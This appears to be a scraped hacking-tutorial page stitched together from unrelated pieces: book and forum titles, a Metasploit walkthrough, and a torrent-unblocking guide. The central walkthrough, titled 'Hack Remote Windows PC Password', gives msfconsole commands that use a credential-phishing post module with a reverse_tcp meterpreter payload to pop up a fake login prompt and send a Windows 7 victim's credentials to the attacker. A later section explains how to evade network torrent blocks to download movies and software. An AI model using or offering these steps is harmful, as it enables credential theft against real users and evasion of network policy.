Cyber Security and Privacy Third Cyber Security and Privacy EU Forum, CSP Forum 2014, Athens


Hacking Exposed Wireless, 3rd Edition: Wireless Security Secrets & Solutions


Hack Remote Windows PC Password using Phishing Login Prompt

This module is able to perform a phishing attack on the target by popping up a loginprompt. When the user fills credentials in the loginprompt, the credentials will be sent to the attacker. The module is able to monitor for new processes and popup a loginprompt when a specific process is starting. Tested on Windows 7.

Exploit Targets
Windows 7

Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use post/windows/gather/phish_windows_credentials
msf exploit (phish_windows_credentials)>set payload windows/meterpreter/reverse_tcp
msf exploit (phish_windows_credentials)>set lhost (IP of Local Host)
msf exploit (phish_windows_credentials)>set session 1
msf exploit (phish_windows_credentials)>exploit  

How to Download from Torrents when Torrent is Block in Your Network

From Wikipedia

Tribler is an open source anonymous peer-to-peer decentralized Bit Torrent client. Tribler is based on the Bit Torrent protocol and uses an overlay network for content searching, which makes the program operate independent of external websites and renders it immune to limiting external action, for example, government restraint. Due to this overlay network Tribler does not require an external website or indexing service to discover content. The user interface of Tribler is very basic and focused on ease of use, instead of diversity of features. Tribler is available for Linux, Windows, and OS X.

First Download Tribler from here and install in your pc

Now search your desired movies, software and etc. you want to download from torrent

Servers for Hackers: Server Administration for Programmers